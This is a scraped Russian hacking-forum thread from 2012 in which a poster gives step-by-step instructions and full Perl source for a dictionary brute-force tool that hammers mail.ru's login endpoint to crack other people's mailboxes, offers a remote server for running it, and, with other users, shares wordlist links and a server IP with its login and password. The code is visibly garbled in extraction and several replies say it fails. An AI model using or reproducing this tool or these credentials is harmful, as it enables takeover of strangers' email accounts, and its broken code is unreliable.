ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Взлом mail.ru - perl брут (https://forum.antichat.xyz/showthread.php?t=8051974)

tickhack 19.01.2012 01:00

Взломать аккаунт на mail.ru довольно просто, самый простой способ это перебор паролей по словарю)

Данный брут написан на языке Perl поэтому перед тем как читать дальше скачайте и установите Active Perl по адресу http://www.activestate.com/activeperl/

Сделано? Отлично...
Теперь создайте отдельную папку в которой будем создавать скрипт и создайте в этой папке пустые файлы перечисленные ниже:

code:

brute-mail.txt
mail.txt
pass.txt
log.txt

Теперь в файл mail.txt напишите встолбик адреса мыл на мэил ру которые необходимо ломануть
В файл pass.txt поместите словарь для брута - в столбик слова или цифры по которым будем подбирать.

Теперь в этой же папке создайте пустой текстовый файл и поместите в него код написанный ниже:

Код:

source:

Код:

#!/usr/bin/perl
use
LWP::UserAgent;
print
"########## GeNoM- mail.ru bruter v 1.3 ###############\n"
;
my
$ua = LWP::UserAgent->new(
max_size =>
1024
,
agent =>
'kakep brayzer v 9.1.1'
,
timeout =>
30
,
);
 
 
 
$set=
0
;
$setall=
0
;
open
email,
") {
$mails=~
s/\n//
;
# убираем символ конца строки
($login,$domain)=
split
(
/\@/
,$mails);
# разбираем мыло на логин и домен
if
($log==
1
){
open
logg,
">>log.txt"
;
print
logg
"-----Start brute-->$login\@$domain\n"
;
close
logg;}
open
pass,
"$login\@$domain\n\n"
;
open
logg,
">>log.txt"
;
print
logg
"\n-----Start brute-->$login\@$domain\n\n"
;
close
logg;
while
($password=) {
$password=~
s/\n//
;
# убираем символ конца строки
my
$req = HTTP::Request->new(
POST =>
'http://win.mail.ru/cgi-bin/auth'
);
$req->content(
"page=&post=&login_from=http://mail.ru/&Login=$login&Domain=$domain&Password=$password"
);
$req->referer(
'http://win.mail.ru/cgi-bin/auth'
);
my
$res = $ua->request($req);
$yda4a=$res->as_string;
if
($yda4a=~
m/500 Can't connect/
==
1
) {
print
"$yda4a\n"
;
exit
;}
# выводим текущее состояние брута
if
($set==$setting){$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
open
logg,
">>log.txt"
;$time=
localtime
;$time=
substr
($time,
4
,
15
);
print
logg
"Send pass->$password  Bcego proBepeHo-->$setall  Time-->$time\n"
;
close
logg;$set=
0
;}
if
($yda4a=~
m/checkcookie/
==
1
) {
print
"For $login\@$domain password->$password\n"
;
open
brut,
">>brute-mail.txt"
;
print
brut
"$login\@$domain password->$password\n"
;
close
brut;
open
logg,
">>log.txt"
;
print
logg
"For $login\@$domain password->$password\n"
;
close
logg;
goto
nashol;}   
 
$set++;   
$setall++;     
 
}
 
nashol:
close
pass;
}
close
email;


Переименуйте этот файл на mail-ru.pl

Все, брутфорс готов!
Двойным щелчком запустите mail-ru.pl и в появившемся окне наблюдайте за ходом бручения.
В файле log.txt будет фиксироваться отчет, а в файле brute-mail.txt будут появляться взломанные мыла.
вот дедик для брута только есть просьба не меняйте пароля создайте себе учётку и пользуйтесь
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

STALKER 20.01.2012 01:00

Понял! Это эффективно

tickhack 20.01.2012 01:00

если помог от + не откажусь !

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Yorvet

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

а ты попробуй много пассов написать и в том числе правильный и проверь !

Chapchev 20.01.2012 01:00

Цитата:

Сообщение от tickhack

а ты попробуй много пассов написать и в том числе правильный и проверь !

Написал много паролей. Среди них правильный.
Ничего не происходит.
Гуды не видит.

Andorfin 20.01.2012 01:00

Шляпа весь этот брут я так понял,даже не ставил ничего,ждал отзывов

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Andorfin

Шляпа весь этот брут я так понял,даже не ставил ничего,ждал отзывов

да ты просто пользоваться не умеешь !

STALKER 20.01.2012 01:00

прощу прощения а где взять это брут?

sibrik 20.01.2012 01:00

Как понять где взять?
Код весь написан же. Устанавливаешь на комп Perl, и делаешь всё как описано.
Или ты что-то другое имел ввиду?

nesquik 20.01.2012 01:00

Active Perl

как именно его запустить?

tickhack 20.01.2012 01:00

Цитата:

Сообщение от nesquik

Active Perl

как именно его запустить?

устанавливаешь перл и потом на C диске создаешь папку script и закинь туда скрипт. заходишь в командную строку и пишешь cd c:\script потом интер потом пишешь имя скрипта и нажемаешь интер и всё !

Yorvet 20.01.2012 01:00

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

Andorfin 20.01.2012 01:00

где взять хорошие словари..?

Yorvet 20.01.2012 01:00

https://hpc.name/showthread.php?t=1671
https://hpc.name/showthread.php?t=16...EE%E2%E0%F0%FC

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Yorvet

Странно, у меня не получается. Решил проверить, в pass записал правильный один пароль для ящика, в mail сам адрес ящика, результат брута нулевой. Что я сделал не так?

ты на своём компе брутил ?

Yorvet 20.01.2012 01:00

Да, на своём.

Andorfin 20.01.2012 01:00

с какого словаря лучше начать..?Ни разу не брутил,просто интересно.Дайте ссылку на актуальный словарь.Спасибо!

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Yorvet

Да, на своём.

попробуй с дедика

tickhack 20.01.2012 01:00

Цитата:

Сообщение от Andorfin

с какого словаря лучше начать..?Ни разу не брутил,просто интересно.Дайте ссылку на актуальный словарь.Спасибо!

словари !
www.passwords.ru/dic.htm
ftp.openwall.com/pub/wordlists/
ftp.cerias.purdue.edu/pub/dict/
ftp.ox.ac.uk/pub/wordlists/
ftp.funet.fi/pub/unix/security/dictionaries/
www.outpost9.com/files/WordLists.html
www.phreak.com/html/wordlists.shtml
coast.cs.purdue.edu/pub/dict/wordlists/
http://www.insidepro.com/rus/download.shtml
www.outpost9.com/files/WordLists.html
http://hw.ucoz.net/load
вот ту коешто накавырял

StoKov 20.01.2012 01:00

Спасибо

levival 21.01.2012 01:00

Объясните пожалуйста. Начинаю брутить свой маил, для пробы. Выскакивает окошко проверяет 7 паролей и закрывается.

tickhack 22.01.2012 01:00

Цитата:

Сообщение от new User

подскажите а вот
code:

IP-178.16.145.94 учетка-логин console; пароль 444444405

что с ним делать ? объясните пожалуйста

погугли там всё есть ! или на форуме !

tickhack 22.01.2012 01:00

Цитата:

Сообщение от Yorvet

Чёт нифига не получается ни так ни эдак. Было бы неплохо если бы ты видеогайд забабахал, а так пока не айс.

я на днях может быть запишу видео !

levival 22.01.2012 01:00

Вроде всё получилось, но возникла другая проблема. К дедику подключился один раз, и всё, больше не получается зайти (не верный логин пароль). Не пойму в чем проблема, в Google полазил менял настройки, все равно не подключается

levival 22.01.2012 01:00

Дедик для этого дела купил. Дедик пингуется, но не могу зайти, ни в ваш, ни в свой

Yorvet 22.01.2012 01:00

Чёт нифига не получается ни так ни эдак. Было бы неплохо если бы ты видеогайд забабахал, а так пока не айс.

new User 22.01.2012 01:00

подскажите а вот
code:

IP-178.16.145.94 учетка-логин console; пароль 444444405

что с ним делать ? объясните пожалуйста

new User 22.01.2012 01:00

что с этим дедиком делать?

sibrik 22.01.2012 01:00

Забей в поиск по сайту "дедик" были несколько тем, где объяснялось, что это такое, для чего, и как с ними работать.

P.S. И смотри внимательнее в какую тему пишешь.

Paladij 22.01.2012 01:00

ыыы, долго не мог разобратся)))) терь наконец то разобрался)

sibrik 22.01.2012 01:00

Цитата:

Сообщение от Paladij

ыыы, долго не мог разобратся)))) терь наконец то разобрался)

Ну написал бы людям как и что, если во всём разобрался и всё получается, а то вон выше посты, пишут что ни чего не выходит.
Поделись с теми у кого не получается что и как делал.

Paladij 22.01.2012 01:00

Цитата:

Сообщение от sibrik

Ну написал бы людям как и что, если во всём разобрался и всё получается, а то вон выше посты, пишут что ни чего не выходит.
Поделись с теми у кого не получается что и как делал.

постораюсь, но вроде бы всё доступным, обще известным русским языком объяснено что и как

Prorok740 23.01.2012 01:00

Норм ;)

tickhack 31.01.2012 01:00

Цитата:

Сообщение от levival

Вроде всё получилось, но возникла другая проблема. К дедику подключился один раз, и всё, больше не получается зайти (не верный логин пароль). Не пойму в чем проблема, в Google полазил менял настройки, все равно не подключается

Ну наверно какойта не блогодарный барыга изменил логин и пароль дедика

beknazar 31.01.2012 01:00

Скоко там хайда?

Yorvet 31.01.2012 01:00

Цитата:

Сообщение от tickhack

Ну наверно какойта не блогодарный барыга изменил логин и пароль дедика

Извини, но сдаётся мне этот брут банально не работает, вот и всё. Может в описании ы упустил какую-то деталь, которую не упустил у себя, раз ты единственный, у кого с ним всё в порядке?

tickhack 31.01.2012 01:00

Цитата:

Сообщение от Yorvet

Извини, но сдаётся мне этот брут банально не работает, вот и всё. Может в описании ы упустил какую-то деталь, которую не упустил у себя, раз ты единственный, у кого с ним всё в порядке?

А мне здаётся то что ты пользоваться не умеешь !

Yorvet 31.01.2012 01:00

Цитата:

Сообщение от tickhack

А мне здаётся то что ты пользоваться не умеешь !

Спокойнее, dh'oine. Когда сам вопросы задаёшь или сетуешь на нерабочие программы, меньше всего ждёшь того, что тебе начнут огрызаться, не так ли? На этом переписку закончим.

killer5 31.01.2012 01:00

Привет, зашел на дедик по логопассу, открыл папку, в маил.тхт написал мыло в пасс.тхт написал верный пароль и еще нескоко не верных, после запуска нефига не находит, тупо в лог пишется типо начался брут и усе

miarhipov 01.02.2012 01:00

Народ вот скажите что я не прав, мы с товарищем решили создать свой словарь для брута для проверки, пароль был элементарный типа 87772412701M это "цифры" "Заглавные" так словарь получился 2 гига с кепкой и еще более 100000000000 кол- во паролей вот и как использовать брут чтобы чтобы ломануть пароль 123qWe нужно минимум пару месяцев брутить?


Время: 19:12